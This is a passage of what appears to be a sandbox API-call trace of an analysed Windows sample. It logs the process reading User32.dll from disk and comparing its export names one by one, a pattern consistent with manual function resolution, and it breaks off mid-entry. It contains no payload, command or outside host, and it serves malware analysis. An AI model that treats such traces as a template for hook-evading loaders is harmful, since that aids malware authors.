[0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0139.994] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0139.994] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0139.994] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0139.994] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0139.994] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0139.994] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0139.995] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0140.005] GetProcessHeap () returned 0x530000 [0140.005] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x530000) returned 1 [0140.005] GetProcessHeap () returned 0x530000 [0140.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x5490a0 [0140.006] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0140.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0140.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0140.006] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0140.006] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0140.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0140.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0140.007] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0140.007] GetProcessHeap () returned 0x530000 [0140.007] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1555b8) returned 0x4118040 [0140.010] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0140.010] ReadFile (in: hFile=0x17c, lpBuffer=0x4118040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4118040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0140.584] CloseHandle (hObject=0x17c) returned 1 [0140.585] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0140.585] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0140.585] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0140.585] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0140.585] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0140.585] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0140.585] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0140.585] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0140.585] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0140.585] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0140.585] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0140.585] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0140.585] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0140.585] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0140.585] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0140.585] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0140.586] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0140.586] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0140.586] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0140.586] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0140.586] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0140.586] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0140.586] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0140.587] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0140.587] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0140.587] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0140.588] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0140.588] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0140.588] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0140.589] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0140.589] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0140.590] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0140.590] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0140.590] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0140.590] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0140.590] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0140.590] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0140.590] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0140.591] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0140.591] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0140.592] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0140.593] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", 